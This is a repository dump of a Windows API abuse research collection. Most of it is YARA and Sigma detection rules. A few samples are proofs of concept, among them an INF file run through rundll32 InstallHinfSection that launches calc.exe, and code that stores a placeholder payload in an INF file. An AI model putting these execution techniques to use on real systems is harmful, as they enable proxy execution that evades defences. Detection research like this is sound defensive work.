├── atlas.png ├── NTDLL ├── NtCreateSection │ ├── NtCreateSection.png │ └── NtCreateSection.yar ├── EtwEventWrite │ ├── donut_ewteventwrite.png │ └── EtwEventWrite.yar ├── DbgUiRemoteBreakin │ ├── DbgUiRemoteBreakin.png │ └── DbgUiRemoteBreakin.yar ├── NtImpersonateThread │ ├── NtImpersonateThread.png │ └── NtImpersonateThread.yar ├── NtWriteVirtualMemory │ ├── NtWriteVirtualMemory.png │ ├── NtWriteVirtualMemory.yar │ └── sample.c ├── NtProtectVirtualMemory │ ├── NtProtectVirtualMemory.png │ └── NtProtectVirtualMemory.yar ├── NtSetInformationThread │ └── NtSetInformationThread_antidebug.png ├── EtwNotificationRegister │ └── EtwNotificationRegister.yar ├── EtwProviderEnabled │ └── EtwProviderEnabled.yar ├── NtSetDebugFilterState │ └── NtSetDebugFilterState.yar ├── NtSuspendProcess │ └── NtSuspendProcess.yar ├── NtRaiseHardError │ └── NtRaiseHardError.yar ├── LdrLoadDll │ └── LdrLoadDll.yar ├── NtQueryVirtualMemory │ └── NtQueryVirtualMemory.yar ├── NtAllocateVirtualMemory │ └── NtAllocateVirtualMemory.yar ├── NtMapViewOfSection │ ├── sample.c │ └── NtMapViewOfSection.yar ├── NtQuerySystemInformation │ └── NtQuerySystemInformation.yar ├── ZwUnmapViewOfSection │ └── ZwUnmapViewOfSection.yar ├── NtCreateThreadEx │ └── NtCreateThreadEx.yar ├── NtSetInformationProcess │ └── NtSetInformationProcess.yar ├── NtReadVirtualMemory │ └── NtReadVirtualMemory.yar ├── NtTraceEvent │ └── NtTraceEvent.yar ├── NtOpenProcessToken │ └── NtOpenProcessToken.yar ├── NtQueryInformationProcess │ └── NtQueryInformationProcess.yar ├── NtUnmapViewOfSection │ └── NtUnmapViewOfSection.yar ├── NtCreateFile │ └── NtCreateFile.yar ├── NtCreateKey │ └── NtCreateKey.yar ├── NtAlpcConnectPort │ └── NtAlpcConnectPort.yar ├── NtQueueApcThread │ └── NtQueueApcThread.yar ├── ZwQuerySystemInformationEx │ └── ZwQuerySystemInformation.yar ├── RtlCreateUserThread │ └── RtlCreateUserThread.yar ├── NtSystemDebugControl │ └── NtSystemDebugControl.yar ├── RtlCreateUserProcess │ └── RtlCreateUserProcess.yar ├── NtLoadDriver │ └── NtLoadDriver.yar ├── LdrGetProcedureAddress │ └── LdrGetProcedureAddress.yar └── NtDeviceIoControlFile │ └── NtDeviceIoControlFile.yar ├── PSAPI ├── EnumProcessModules │ ├── EnumProcessModules.png │ └── EnumProcessModules.yar ├── psapi.yar └── GetModuleFileNameEx │ └── GetModuleFileNameEx.yar ├── go.mod ├── go.sum ├── NETAPI32 ├── NetLocalGroupGetMembers │ ├── PowerSploit_recon.png │ ├── NetLocalGroupGetMembers.yar │ └── README.md ├── NetRemoteTOD │ ├── NetRemoteTOD.yar │ └── sample.cs ├── NetUserAdd │ └── NetUserAdd.yar └── DsGetDcName │ └── DsGetDcName.yar ├── ADVAPI32 ├── LsaRetrievePrivateData │ ├── LsaRetrievePrivateData.png │ └── LsaRetrievePrivateData.yar ├── LsaOpenPolicy │ ├── LsaOpenPolicy.yar │ └── README.md ├── AdjustTokenPrivileges │ └── AdjustTokenPrivileges.yar ├── CredEnumerateW │ ├── CredEnumerateW.yar │ └── sample.c ├── CreateProcessAsUser │ └── CreateProcessAsUser.yar ├── CryptEnumProviders │ ├── CryptEnumProviders.yar │ └── sample.c ├── CreateProcessWithTokenW │ ├── CreateProcessWithTokenW.yar │ └── sample.c ├── RegEnumKeyEx │ └── RegEnumKeyEx.yar ├── DuplicateTokenEx │ └── DuplicateTokenEx.yar ├── OpenSCManager │ └── OpenSCManager.yar ├── OpenProcessToken │ └── OpenProcessToken.yar ├── ControlService │ └── ControlService.yar ├── ImpersonateLoggedOnUser │ └── ImpersonateLoggedOnUser.yar └── RegSetValueEx │ └── RegSetValueEx.yar ├── KERNEL32 ├── UpdateProcThreadAttribute │ ├── UpdateProcThreadAttribute.png │ └── UpdateProcThreadAttribute.yar ├── EnumProcesses │ ├── sample.c │ ├── sample.go │ └── EnumProcesses.yar ├── CreateFileTransacted │ ├── CreateFileTransacted.yar │ └── sample.c ├── CreateToolhelp32Snapshot │ ├── CreateToolhelp32Snapshot.yar │ └── sample.c ├── WriteProfileString │ ├── sample.c │ └── WriteProfileString.yar ├── SetSearchPathMode │ ├── SetSearchPathMode.yar │ └── sample.c ├── SetDllDirectory │ ├── SetDllDirectory.yar │ └── README.md ├── GetSystemFirmwareTable │ ├── GetSystemFirmwareTable.yar │ └── sample.c ├── VirtualProtectEx │ └── VirtualProtectEx.yar ├── CreateRemoteThread │ ├── CreateRemoteThread.yar │ └── CreateRemoteThread.c ├── CreateEvent │ └── CreateEvent.yar ├── CreateNamedPipe │ └── CreateNamedPipe.yar ├── VirtualAllocEx │ └── VirtualAllocEx.yar ├── SetThreadContext │ └── SetThreadcontext.yar ├── EnumSystemLocalesW │ └── sample.go ├── CreateFileMapping │ └── CreateFileMapping.yar ├── PssCaptureSnapshot │ ├── PssCaptureSnapshot.yar │ └── sample.c ├── LoadLibrary │ └── LoadLibrary.yar └── WriteProcessMemory │ └── WriteProcessMemory.yar ├── SETUPAPI ├── InstallHinfSection │ ├── sample │ │ ├── malicious.inf │ │ └── sample.py │ ├── InstallHinfSection.sigma │ └── InstallHinfSection.yar └── SetupInstallFile │ ├── SetupInstallFile.yar │ └── sample.c ├── SHELL32 ├── ShellExecute │ ├── sample.c │ └── ShellExecute.yar └── SHGetKnownFolderPath │ ├── SHGetKnownFolderPath.yar │ └── README.md ├── DNSAPI └── DnsQuery │ └── DnsQuery.yar ├── MPR └── WNetAddConnection2 │ └── WNetAddConnection2.yar ├── RASAPI32 └── RasEnumConnections │ ├── RasEnumConnections.yar │ └── sample.c ├── WINHTTP └── WinHttpConnect │ └── WinHttpConnect.yar ├── USER32 ├── LockWorkStation │ ├── LockWorkStation.yar │ └── sample.cpp ├── OpenDesktop │ └── OpenDesktop.yar ├── SetWindowsHookEx │ └── SetWindowsHookEx.yar └── SetClipboardData │ └── SetClipboardData.yar ├── URLMON └── URLDownloadToFile │ └── URLDownloadToFile.yar ├── AMSI ├── AmsiScanString │ ├── sample.c │ ├── AmsiScanString.yar │ └── README.md └── AmsiScanBuffer │ └── AmsiScanBuffer.yar ├── FWPUCLNT └── FwpmEngineOpen │ ├── FwpmEngineOpen.yar │ ├── sample1.c │ └── sample2.c ├── OLE32 ├── CoCreateInstance │ ├── CoCreateInstance.yar │ └── sample.c ├── CoCreateInstanceEx │ ├── CoCreateInstanceEx.yar │ └── sample.c └── CoGetClassObject │ └── CoGetClassObject.yar ├── .gitignore ├── UIAUTOMATIONCORE └── AddAutomationEventHandler │ └── AddAutomationEventHandler.yar └── DBGHELP └── MiniDumpWriteDump └── MiniDumpWriteDump.yar /atlas.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/atlas.png -------------------------------------------------------------------------------- /NTDLL/NtCreateSection/NtCreateSection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/NtCreateSection/NtCreateSection.png -------------------------------------------------------------------------------- /NTDLL/EtwEventWrite/donut_ewteventwrite.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/EtwEventWrite/donut_ewteventwrite.png -------------------------------------------------------------------------------- /NTDLL/DbgUiRemoteBreakin/DbgUiRemoteBreakin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/DbgUiRemoteBreakin/DbgUiRemoteBreakin.png -------------------------------------------------------------------------------- /NTDLL/NtImpersonateThread/NtImpersonateThread.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/NtImpersonateThread/NtImpersonateThread.png -------------------------------------------------------------------------------- /PSAPI/EnumProcessModules/EnumProcessModules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/PSAPI/EnumProcessModules/EnumProcessModules.png -------------------------------------------------------------------------------- /NTDLL/NtWriteVirtualMemory/NtWriteVirtualMemory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/NtWriteVirtualMemory/NtWriteVirtualMemory.png -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/yourusername/WindowsAPIAbuseAtlas 2 | 3 | go 1.23.0 4 | 5 | toolchain go1.23.11 6 | 7 | require golang.org/x/sys v0.34.0 // indirect 8 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.34.0 h1:H5Y5sJ2L2JRdyv7ROF1he/lPdvFsd0mJHFw2ThKHxLA= 2 | golang.org/x/sys v0.34.0/go.mod h1:BJP2sWEmIv4KK5OTEluFJCKSidICx8ciO85XgH3Ak8k= 3 | -------------------------------------------------------------------------------- /NETAPI32/NetLocalGroupGetMembers/PowerSploit_recon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NETAPI32/NetLocalGroupGetMembers/PowerSploit_recon.png -------------------------------------------------------------------------------- /NTDLL/NtProtectVirtualMemory/NtProtectVirtualMemory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/NtProtectVirtualMemory/NtProtectVirtualMemory.png -------------------------------------------------------------------------------- /ADVAPI32/LsaRetrievePrivateData/LsaRetrievePrivateData.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/ADVAPI32/LsaRetrievePrivateData/LsaRetrievePrivateData.png -------------------------------------------------------------------------------- /KERNEL32/UpdateProcThreadAttribute/UpdateProcThreadAttribute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/KERNEL32/UpdateProcThreadAttribute/UpdateProcThreadAttribute.png -------------------------------------------------------------------------------- /SETUPAPI/InstallHinfSection/sample/malicious.inf: -------------------------------------------------------------------------------- 1 | [Version] 2 | Signature="$Windows NT$" 3 | 4 | [DefaultInstall] 5 | RunPreSetupCommands=RunMe 6 | 7 | [RunMe] 8 | "cmd.exe /c calc.exe" 9 | -------------------------------------------------------------------------------- /NTDLL/NtSetInformationThread/NtSetInformationThread_antidebug.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/danafaye/WindowsAPIAbuseAtlas/HEAD/NTDLL/NtSetInformationThread/NtSetInformationThread_antidebug.png -------------------------------------------------------------------------------- /SHELL32/ShellExecute/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | const char* url = "https://github.com/danafaye/WindowsAPIAbuseAtlas"; 5 | 6 | ShellExecuteA(NULL, "open", url, NULL, NULL, SW_SHOWNORMAL); 7 | 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /PSAPI/psapi.yar: -------------------------------------------------------------------------------- 1 | // Just for research. There is no other reason to use this rule. 2 | 3 | import "pe" 4 | 5 | rule Detect_PSAPI_DLL_Import { 6 | meta: 7 | description = "Detects PE files importing psapi.dll" 8 | condition: 9 | pe.imports("psapi.dll") > 0 10 | } -------------------------------------------------------------------------------- /KERNEL32/EnumProcesses/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() { 6 | DWORD processIds[1024], bytesReturned; 7 | unsigned int i, numProcs; 8 | 9 | if (!EnumProcesses(processIds, sizeof(processIds), &bytesReturned)) { 10 | printf("EnumProcesses failed. Error: %lu\n", GetLastError()); 11 | return 1; 12 | } 13 | 14 | numProcs = bytesReturned / sizeof(DWORD); 15 | printf("Found %u running processes:\n", numProcs); 16 | 17 | for (i = 0; i < numProcs; i++) { 18 | printf("PID: %lu\n", processIds[i]); 19 | } 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /DNSAPI/DnsQuery/DnsQuery.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule DnsQuery_Usage 6 | { 7 | meta: 8 | description = "Detects common abuse patterns of DnsQuery use in malware" 9 | author = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $DnsQuery = "DnsQuery" 13 | 14 | condition: 15 | uint16(0) == 0x5A4D and 16 | filesize < 5MB and 17 | $DnsQuery 18 | } -------------------------------------------------------------------------------- /NTDLL/EtwNotificationRegister/EtwNotificationRegister.yar: -------------------------------------------------------------------------------- 1 | rule Suspicious_EtwNotificationRegister_Usage 2 | { 3 | meta: 4 | author = "Windows API Abuse Atlas" 5 | description = "Detects suspicious usage of EtwNotificationRegister, often abused for telemetry-aware evasion" 6 | 7 | strings: 8 | $api_name1 = "EtwNotificationRegister" ascii wide 9 | $api_name2 = "EtwSetNotificationCallback" ascii wide 10 | 11 | condition: 12 | uint16(0) == 0x5A4D and // PE header "MZ" 13 | 14 | // Detect either static import or dynamic resolution of EtwNotificationRegister or related APIs 15 | $api_name1 or $api_name2 16 | } 17 | -------------------------------------------------------------------------------- /NTDLL/EtwProviderEnabled/EtwProviderEnabled.yar: -------------------------------------------------------------------------------- 1 | rule Potential_EtwProviderEnabled_Abuse 2 | { 3 | meta: 4 | description = "Detects binaries that reference EtwProviderEnabled, which may indicate ETW evasion or stealthy execution logic" 5 | author = "Windows API Abuse Atlas" 6 | 7 | strings: 8 | $etw_string1 = "EtwProviderEnabled" ascii 9 | $etw_string2 = "EtwEventWrite" ascii 10 | $etw_string3 = "EtwEventRegister" ascii 11 | $etw_string4 = "EtwWriteEx" ascii 12 | $etw_bytes = { 48 89 ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? } // generic MOV+CALL pattern around ETW APIs 13 | 14 | condition: 15 | (1 of ($etw_string*)) or ($etw_bytes) 16 | } 17 | -------------------------------------------------------------------------------- /KERNEL32/CreateFileTransacted/CreateFileTransacted.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Detect_CreateFileTransacted 7 | { 8 | meta: 9 | description = "Detects presence of CreateFileTransacted API usage" 10 | author = "Windows API Abuse Atlas" 11 | 12 | strings: 13 | $api_name = "CreateFileTransacted" ascii nocase 14 | 15 | condition: 16 | (uint16(0) == 0x5A4D) and // PE file 17 | $api_name 18 | } -------------------------------------------------------------------------------- /KERNEL32/CreateToolhelp32Snapshot/CreateToolhelp32Snapshot.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Suspicious_CreateToolhelp32Snapshot_Abuse 4 | { 5 | meta: 6 | description = "Detects potential abuse of CreateToolhelp32Snapshot for process/module enumeration" 7 | reference = "Windows API Abuse Atlas" 8 | 9 | strings: 10 | $api1 = "CreateToolhelp32Snapshot" ascii 11 | $api2 = "Process32First" ascii 12 | $api3 = "Process32Next" ascii 13 | $api4 = "Module32First" ascii 14 | $api5 = "Module32Next" ascii 15 | 16 | condition: 17 | uint16(0) == 0x5A4D and // PE file 18 | $api1 and 19 | 1 of ($api2, $api3, $api4, $api5) and 20 | filesize < 2MB 21 | } 22 | -------------------------------------------------------------------------------- /NTDLL/NtSetDebugFilterState/NtSetDebugFilterState.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Detect_NtSetDebugFilterState 6 | { 7 | meta: 8 | description = "Simple rule that just looks for the string NtSetDebugFilterState in PE file." 9 | reference = "windows-api-abuse-atlas" 10 | strings: 11 | $api = "NtSetDebugFilterState" ascii wide 12 | condition: 13 | uint16(0) == 0x5A4D and 14 | filesize < 10MB and 15 | $api 16 | } -------------------------------------------------------------------------------- /MPR/WNetAddConnection2/WNetAddConnection2.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_WNetAddConnection2 7 | { 8 | meta: 9 | 10 | description = "Detects potential malicious use of WNetAddConnection2 via import or string references" 11 | reference = "Windows API Abuse Atlas: WNetAddConnection2" 12 | 13 | strings: 14 | $WNetAddConnection2A = "WNetAddConnection2A" ascii wide 15 | 16 | condition: 17 | $WNetAddConnection2A 18 | } 19 | -------------------------------------------------------------------------------- /NTDLL/NtSuspendProcess/NtSuspendProcess.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtSuspendProcess_Usage 6 | { 7 | meta: 8 | description = "Detects potential malicious usage of NtSuspendProcess API" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $NtSuspendProcess = "NtSuspendProcess" ascii wide 13 | 14 | condition: 15 | uint16(0) == 0x5A4D and // PE file 16 | filesize < 10MB and 17 | $NtSuspendProcess 18 | } -------------------------------------------------------------------------------- /RASAPI32/RasEnumConnections/RasEnumConnections.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule RASAPI32_RasEnumConnections 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects the presence of the RasEnumConnections function, which can be used to enumerate active RAS connections." 10 | 11 | strings: 12 | $func_name = "RasEnumConnections" ascii wide 13 | 14 | condition: 15 | uint16(0) == 0x5A4D and // PE file 16 | filesize < 10MB and 17 | any of them 18 | } -------------------------------------------------------------------------------- /SETUPAPI/SetupInstallFile/SetupInstallFile.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_SetupInstallFile 7 | { 8 | meta: 9 | description = "Detects suspicious Suspicious_SetupInstallFile for command execution" 10 | reference = "Windows API Abuse Atlas: Suspicious_SetupInstallFile" 11 | 12 | strings: 13 | $SetupInstallFile = "SetupInstallFile" ascii wide 14 | 15 | condition: 16 | uint16(0) == 0x5A4D and // PE file 17 | filesize < 10MB and 18 | $SetupInstallFile 19 | } 20 | -------------------------------------------------------------------------------- /SETUPAPI/InstallHinfSection/InstallHinfSection.sigma: -------------------------------------------------------------------------------- 1 | title: Abuse of InstallHinfSectionW via rundll32.exe 2 | id: 8dc0fa14-11df-4d2f-b88e-cf5c893ed5d4 3 | status: experimental 4 | description: Detects potential abuse of InstallHinfSectionW via rundll32.exe executing setupapi.dll 5 | author: Dana Behling 6 | date: 2025-07-01 7 | logsource: 8 | category: process_creation 9 | product: windows 10 | detection: 11 | selection: 12 | Image|endswith: '\rundll32.exe' 13 | CommandLine|contains: 'setupapi.dll,InstallHinfSection' 14 | condition: selection 15 | fields: 16 | - Image 17 | - CommandLine 18 | - ParentImage 19 | falsepositives: 20 | - Rare but possible in legacy setup tools or certain driver installations 21 | level: high 22 | tags: 23 | - attack.defense_evasion 24 | - attack.t1218.010 25 | -------------------------------------------------------------------------------- /KERNEL32/WriteProfileString/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | LPCSTR section = "Loader"; 6 | LPCSTR key = "Payload"; 7 | LPCSTR value = "TVqQAAMAAAAEAAAA"; // could be base64 payload 8 | LPCSTR iniPath = "C:\\Users\\Public\\loader.ini"; 9 | 10 | BOOL result = WriteProfileStringA(section, key, value); 11 | 12 | // Optional: also write to a custom .ini file path 13 | // This version writes to a non-default INI file using kernel32's WritePrivateProfileString 14 | BOOL result2 = WritePrivateProfileStringA(section, key, value, iniPath); 15 | 16 | if (result && result2) { 17 | printf("Successfully wrote to INI file.\n"); 18 | } else { 19 | printf("Failed to write. Error code: %lu\n", GetLastError()); 20 | } 21 | 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /WINHTTP/WinHttpConnect/WinHttpConnect.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_WinHttp_Strings 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects binaries that reference WinHTTP API strings such as WinHttpConnect" 10 | date = "2025-09-30" 11 | strings: 12 | $w1 = "WinHttpConnect" wide nocase 13 | $a1 = "WinHttpOpenRequest" ascii nocase 14 | $a2 = "WinHttpSendRequest" ascii nocase 15 | condition: 16 | (uint16(0) == 0x5A4D) and /* basic PE check */ 17 | all of them 18 | } -------------------------------------------------------------------------------- /KERNEL32/SetSearchPathMode/SetSearchPathMode.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule malware_SetSearchPathMode_use 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects import of SetSearchPathMode API, which can be a sign of malicious DLL side-loading." 10 | 11 | strings: 12 | $SetSearchPathMode = "SetSearchPathMode" ascii wide 13 | 14 | condition: 15 | // Ensure the file is a PE executable 16 | uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 17 | 18 | $SetSearchPathMode 19 | } -------------------------------------------------------------------------------- /ADVAPI32/LsaOpenPolicy/LsaOpenPolicy.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_LsaOpenPolicy_Usage 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects potential usage of the LsaOpenPolicy API" 10 | scope = "research / hunting" 11 | note = "High false positive risk – intended for threat hunting, not production detection." 12 | 13 | strings: 14 | $LsOpenPolicy = "LsOpenPolicy" ascii wide 15 | 16 | condition: 17 | uint16(0) == 0x5A4D and 18 | filesize < 5MB and 19 | $LsaOpenPolicy 20 | } 21 | -------------------------------------------------------------------------------- /NETAPI32/NetRemoteTOD/NetRemoteTOD.yar: -------------------------------------------------------------------------------- 1 | 2 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 3 | // for threat hunting and research purposes — not for deployment in detection systems that 4 | // require a low false positive rate. Please review and test in your environment before use. 5 | 6 | rule Detect_NetRemoteTOD_Import 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detects import or string reference to NetRemoteTOD API in PE binaries" 11 | 12 | strings: 13 | // ASCII string often present in import tables or debug info 14 | $api1 = "NetRemoteTOD" 15 | // Wide string variant (UTF-16 LE) 16 | $api2 = { 4E 00 65 00 74 00 52 00 65 00 6D 00 6F 00 74 00 65 00 54 00 4F 00 44 00 } 17 | 18 | condition: 19 | any of them 20 | } 21 | -------------------------------------------------------------------------------- /SETUPAPI/InstallHinfSection/sample/sample.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import os 3 | 4 | def run_inf_with_rundll32(inf_path): 5 | if not os.path.exists(inf_path): 6 | print(f"[!] INF file not found: {inf_path}") 7 | return 8 | 9 | cmd = [ 10 | "rundll32.exe", 11 | "setupapi.dll,InstallHinfSection", 12 | "DefaultInstall", 13 | "132", 14 | inf_path 15 | ] 16 | 17 | try: 18 | print(f"[+] Executing: {' '.join(cmd)}") 19 | subprocess.run(cmd, shell=True) 20 | except Exception as e: 21 | print(f"[!] Error executing INF: {e}") 22 | 23 | # Example usage 24 | run_inf_with_rundll32("C:\\Users\\Public\\malicious.inf") 25 | 26 | 27 | # commandline to run basically the same thing as above 28 | # rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 132 C:\path\to\malicious.inf 29 | 30 | -------------------------------------------------------------------------------- /NTDLL/NtRaiseHardError/NtRaiseHardError.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_NtRaiseHardError_Usage 7 | { 8 | meta: 9 | description = "Detects suspicious dynamic resolution or direct use of NtRaiseHardError in userland binaries" 10 | reference = "Windows API Abuse Atlas: NtRaiseHardError" 11 | 12 | strings: 13 | $api_name = "NtRaiseHardError" ascii wide 14 | $get_proc = "GetProcAddress" ascii wide 15 | $load_lib = "LoadLibrary" ascii wide 16 | 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | filesize < 10MB and 20 | all of them 21 | } -------------------------------------------------------------------------------- /NTDLL/LdrLoadDll/LdrLoadDll.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_LdrLoadDll_Usage 6 | { 7 | meta: 8 | description = "Detects binaries importing or referencing LdrLoadDll, often used to bypass LoadLibrary hooks" 9 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 10 | strings: 11 | $ldrloaddll = "LdrLoadDll" ascii wide 12 | 13 | condition: 14 | uint16(0) == 0x5A4D and 15 | filesize < 10MB and 16 | // Look for binaries that explicitly reference the API name 17 | // and are PE files that import from ntdll.dll 18 | $ldrloaddll 19 | } -------------------------------------------------------------------------------- /USER32/LockWorkStation/LockWorkStation.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | import "pe" 7 | 8 | rule Detect_LockWorkStation_Import 9 | { 10 | meta: 11 | description = "Detects PE files importing LockWorkStation from user32.dll" 12 | reference = "Windows API Abuse Atlas - LockWorkStation" 13 | strings: 14 | $lock_workstation = "LockWorkStation" ascii wide 15 | 16 | condition: 17 | uint16(0) == 0x5A4D // Check for MZ header 18 | and pe.imports("user32.dll", "LockWorkStation") 19 | and pe.number_of_sections > 2 // Ensure there are sections in the PE file 20 | and $lock_workstation 21 | } 22 | 23 | -------------------------------------------------------------------------------- /ADVAPI32/AdjustTokenPrivileges/AdjustTokenPrivileges.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Detect_AdjustTokenPrivileges_Usage 6 | { 7 | meta: 8 | description = "Detects common abuse patterns of CreateProcessWithTokenW in malware" 9 | author = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $func = "AdjustTokenPrivileges" 13 | $lookup = "LookupPrivilegeValueW" 14 | $open_process = "OpenProcessToken" 15 | $sedebug = "SeDebugPrivilege" 16 | 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | filesize < 5MB and 20 | all of ($func, $lookup) and 21 | any of ($open_process, $sedebug) 22 | } -------------------------------------------------------------------------------- /NTDLL/NtQueryVirtualMemory/NtQueryVirtualMemory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtQueryVirtualMemory_Use 6 | { 7 | meta: 8 | description = "Detects suspicious use of NtQueryVirtualMemory alongside common memory reconnaissance APIs" 9 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 10 | 11 | strings: 12 | $api1 = "NtQueryVirtualMemory" 13 | $api2 = "OpenProcess" 14 | $api3 = "VirtualQueryEx" 15 | $api4 = "ReadProcessMemory" 16 | $api5 = "NtReadVirtualMemory" 17 | 18 | condition: 19 | uint16(0) == 0x5A4D and // PE file magic number 'MZ' 20 | (all of ($api*)) 21 | } -------------------------------------------------------------------------------- /SETUPAPI/InstallHinfSection/InstallHinfSection.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_INF_RunCommands 7 | { 8 | meta: 9 | description = "Detects suspicious INF files that abuse InstallHinfSectionW for command execution" 10 | reference = "Windows API Abuse Atlas – InstallHinfSectionW" 11 | 12 | strings: 13 | $run_pre = "RunPreSetupCommands" 14 | $run_post = "RunPostSetupCommands" 15 | $calc = "cmd.exe /c calc.exe" nocase 16 | $powershell = "powershell.exe" nocase 17 | $default = "[DefaultInstall]" 18 | 19 | condition: 20 | $default and any of ($run_pre, $run_post) and any of ($calc, $powershell) 21 | } 22 